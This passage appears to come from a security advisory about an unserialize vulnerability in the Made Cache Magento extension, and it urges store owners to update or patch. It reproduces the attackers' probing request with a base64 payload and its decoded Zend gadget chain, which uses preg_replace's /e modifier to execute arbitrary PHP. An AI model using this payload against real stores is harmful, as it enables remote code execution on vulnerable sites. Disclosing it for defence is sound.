unserialize
call. It is fixed in this commit.Attackers use the following request to find a vulnerable store:
GET /index.php/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE0OiJleGl0KCJzeXNtb24iKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fX0=Base64-decoded string results in the following PHP Object:
a:3:{s:7:"product";s:1:"1";s:6:"option";s:1:"1";s:1:"x";O:8:"Zend_Log":1:{s:11:"*_writers";a:1:{i:0;O:20:"Zend_Log_Writer_Mail":5:{s:16:"*_eventsToMail";a:1:{i:0;i:1;}s:22:"*_layoutEventsToMail";a:0:{}s:8:"*_mail";O:9:"Zend_Mail":0:{}s:10:"*_layout";O:11:"Zend_Layout":3:{s:13:"*_inflector";O:23:"Zend_Filter_PregReplace":2:{s:16:"*_matchPattern";s:7:"/(.*)/e";s:15:"*_replacement";s:14:"exit("sysmon")";}s:20:"*_inflectorEnabled";b:1;s:10:"*_layout";s:6:"layout";}s:22:"*_subjectPrependText";N;}}}}The PHP object is set to call
exit("sysmon")
or exit("MaZaYaNa")
which simply prints sysmon or MaZaYaNa before exit, however they can insert any PHP code there when they find unpatched store.If you use Made Cache extension please make sure to update it to the latest version or apply a patch from this commit.